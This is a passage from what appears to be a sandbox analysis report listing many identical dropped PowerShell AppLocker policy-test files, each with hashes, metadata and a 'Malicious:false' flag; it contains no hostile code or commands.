                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjivede1.xi3.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpxrjz0g.bm4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtvvw1zg.mec.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_judmw30p.jee.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpoph313.3mo.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktywrgow.yvw.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lydorlll.0ba.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpsaej22.vfb.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrrzgzav.fbn.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvual5sg.ixn.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nahv5311.1ni.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_on4qunsc.dyz.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owkssuoj.l4p.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0mv2qgk.00i.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pakksm2x.xmo.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prn3bmnz.3p5.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r12rufyv.ym0.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtw03ne3.plv.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smwzbcr3.vgk.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sna3bhtb.rwt.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2w1o3bo.uye.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpkk5jeb.s4s.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuqtlie3.buf.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txxwjixh.gke.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uazmublv.fen.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umawcpxv.m2g.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_utid45kj.50q.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvf1dgst.4kd.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcv04pd4.wym.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkjzfgpp.prg.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlwcgcfp.1e3.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
